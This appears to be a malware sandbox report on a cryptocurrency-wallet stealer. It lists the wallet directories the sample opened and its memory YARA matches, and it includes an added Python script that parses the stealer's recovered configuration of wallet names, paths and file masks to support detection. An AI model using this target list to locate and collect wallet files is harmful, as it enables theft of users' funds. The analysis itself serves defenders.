Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
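The wallet-grabber string recovered from kat2B07.tmp memory is a pipe-delimited list of five-field records (display name, root selector, sub-directory, file mask, trailing flag), and the "File opened" events above are the directories the stealer actually enumerated in the sandbox. The following Python is an added example, not code from the sandbox report or from the malware. It parses the recovered format into records, expands each record to the path it targets and cross-checks those paths against the observed opens. Field meanings are inferred from the report itself: root selector 0 resolves to AppData\Local (the Coinomi open) and 1 to AppData\Roaming (the Bitcoin and Exodus opens); selector 2 being %USERPROFILE% and the fifth field being a recursion flag are assumptions, marked as such in the code. The sample strings and the user path C:\Users\user are copied from the report; the constructed TRUNCATED blob mirrors the copy at 00439000 that begins mid-record.

```python
from __future__ import annotations
from dataclasses import dataclass

# Constructed sample: the first records of the string recovered from the
# 009B1000 region of kat2B07.tmp, copied from the report above.
CONFIG = (
    "Bitcoin Core|1|\\Bitcoin\\wallets\\|wallet.dat|1|"
    "Bitcoin Core Old|1|\\Bitcoin\\|*wallet*.dat|0|"
    "Coinomi|0|\\Coinomi\\Coinomi\\wallets\\|*.wallet|0|"
    "Chia Wallet|2|\\.chia\\mainnet\\wallet\\|*.sqlite|0|"
    "Exodus|1|\\Exodus\\exodus.wallet\\|seed.seco|0|"
)

# The 00439000 copy starts mid-record ("um-LTC\wallets\|*.*|0|..."); this
# constructed fragment shows how the parser rejects such a blob.
TRUNCATED = "um-LTC\\wallets\\|*.*|0|Exodus|1|\\Exodus\\|exodus.conf.json|0|"

# "File opened" events attributed to kat2B07.tmp in the report.
OBSERVED_OPENS = [
    "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\wallets\\",
    "C:\\Users\\user\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\",
    "C:\\Users\\user\\AppData\\Roaming\\Exodus\\exodus.wallet\\",
]

# Root selector (second field). 0 and 1 are confirmed by the opens above;
# 2 is an ASSUMPTION (the .chia folder normally lives in %USERPROFILE%).
ROOTS = {
    "0": "C:\\Users\\user\\AppData\\Local",
    "1": "C:\\Users\\user\\AppData\\Roaming",
    "2": "C:\\Users\\user",
}


@dataclass(frozen=True)
class WalletRule:
    name: str
    root: str        # key into ROOTS
    subdir: str      # begins and ends with a backslash in every record
    mask: str        # file mask applied inside that directory
    recursive: bool  # ASSUMPTION: meaning of the fifth field

    def directory(self) -> str:
        return ROOTS[self.root] + self.subdir


def is_complete(blob: str) -> bool:
    """True if the blob holds a whole number of 5-field records."""
    fields = blob.rstrip("|").split("|")
    return len(fields) % 5 == 0


def parse_config(blob: str) -> list[WalletRule]:
    """Split the pipe-delimited blob into WalletRule records."""
    if not is_complete(blob):
        raise ValueError("truncated wallet config (field count not a multiple of 5)")
    fields = blob.rstrip("|").split("|")
    return [
        WalletRule(name, root, subdir, mask, rec == "1")
        for name, root, subdir, mask, rec in zip(*[iter(fields)] * 5)
    ]


def match_opens(rules: list[WalletRule], opens: list[str]) -> dict[str, list[str]]:
    """Map each observed directory open to the rule names that target it."""
    hits: dict[str, list[str]] = {}
    for path in opens:
        hits[path] = [r.name for r in rules if r.directory().lower() == path.lower()]
    return hits


def unconfirmed_roots(rules: list[WalletRule], opens: list[str]) -> set[str]:
    """Root codes never seen in an observed open; their meaning stays an assumption."""
    opened = {p.lower() for p in opens}
    seen = {r.root for r in rules if r.directory().lower() in opened}
    return {r.root for r in rules} - seen


if __name__ == "__main__":
    rules = parse_config(CONFIG)
    for path, names in match_opens(rules, OBSERVED_OPENS).items():
        print(path, "<-", ", ".join(names) or "no rule")
    print("roots not confirmed by any open:", unconfirmed_roots(rules, OBSERVED_OPENS))
```

Running it against the full recovered string gives a ready-made list of directories to watch for access from a process in %TEMP%; the unconfirmed-root check is a reminder that no Chia path appears among the opens, so the meaning of selector 2 cannot be verified from this report alone.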
Source: Yara match File source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2eb7719.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2eb7719.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D745C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset, 2_2_1D745C70
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7B1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7B1FE0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7ADFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset, 2_2_1D7ADFC0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D85D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log, 2_2_1D85D9E0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7D5910 sqlite3_mprintf,sqlite3_bind_int64, 2_2_1D7D5910
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7ADB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free, 2_2_1D7ADB10
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7D55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7D55B0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D8514D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log, 2_2_1D8514D0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D85D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log, 2_2_1D85D4F0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D80D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D80D610
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7D51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7D51D0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7C9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf, 2_2_1D7C9090
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7ED3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7ED3B0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D814D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free, 2_2_1D814D40
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D768CB0 sqlite3_bind_zeroblob, 2_2_1D768CB0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D760FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset, 2_2_1D760FB0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D768970 sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 2_2_1D768970
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D744820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize, 2_2_1D744820
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D788550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset, 2_2_1D788550
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D768430 sqlite3_bind_int64, 2_2_1D768430
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7806E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset, 2_2_1D7806E0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D758680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64, 2_2_1D758680
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D814140 sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_initialize,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset, 2_2_1D814140
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7A8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset, 2_2_1D7A8200
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D767810 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset, 2_2_1D767810
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D75B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64, 2_2_1D75B400
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7F3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7F3770
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D8137E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D8137E0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D78EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code, 2_2_1D78EF30
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7AA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value, 2_2_1D7AA6F0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7466C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset, 2_2_1D7466C0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7AE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7AE170
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D79E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset, 2_2_1D79E090
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D79E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset, 2_2_1D79E200